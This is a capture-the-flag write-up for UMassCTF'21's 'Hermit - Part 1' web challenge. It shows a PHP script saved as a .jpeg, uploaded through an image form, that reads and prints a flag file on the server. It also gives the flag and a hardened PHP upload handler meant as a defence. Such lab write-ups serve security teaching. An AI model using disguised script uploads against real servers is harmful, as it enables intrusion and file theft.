UMassCTF'21: Hermit - Part 1

Hermit - Part 1

Category: web

50 points

Help henry find a new shell

http://104.197.195.221:8086 http://34.121.84.161:8086

Created by Cobchise#6969

Hint: How do you know a file is an image?

Solution

The challenge is about PHP remote code execution. At the given address there is a web page with an “image” upload ;-)


I messed around on the system for a while and finally prepared ugabuga.jpeg with the content below to get the flag.

<?php
    $filestring = file_get_contents('/home/hermit/flag/userflag.txt');
    print $filestring;
?>


Flag

UMASS{a_picture_paints_a_thousand_shells}
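
The hint's question answered from the server side, as an added example that is not the challenge's code or part of the original write-up: an upload handler that decides the file type from the bytes, re-encodes the image, and picks the stored name itself. The form field name `image`, the `UPLOAD_DIR` path, the size limit and the function name are assumptions made for illustration.

```php
<?php
// Added example (not the challenge's code): hardened image upload handler.
declare(strict_types=1);

// Assumption: this directory is served as static files only (no PHP handler).
const UPLOAD_DIR = '/var/www/uploads';
const ALLOWED    = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
const MAX_BYTES  = 2 * 1024 * 1024;

function store_image_upload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }

    // Decide the type from the content. $file['name'] and $file['type']
    // are chosen by the client, so a ".jpeg" name proves nothing.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime === false || !array_key_exists($mime, ALLOWED)) {
        throw new RuntimeException('not an allowed image type');
    }

    // Decode with GD and write a fresh image. A text file such as a PHP
    // script fails to decode; the output holds only re-encoded pixel data.
    $img = @imagecreatefromstring((string) file_get_contents($file['tmp_name']));
    if ($img === false) {
        throw new RuntimeException('file does not decode as an image');
    }

    // Server-chosen random name and extension; the client's name is discarded.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    $ok   = $mime === 'image/png' ? imagepng($img, $dest) : imagejpeg($img, $dest, 90);
    if (!$ok) {
        throw new RuntimeException('could not store image');
    }
    return $name;
}

// Usage in the upload endpoint (field name "image" is an assumption):
// $stored = store_image_upload($_FILES['image']);
```

The content check and re-encoding are defence in depth; the control that matters most is that the web server never hands files in the upload directory to the PHP interpreter.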

luc © 2021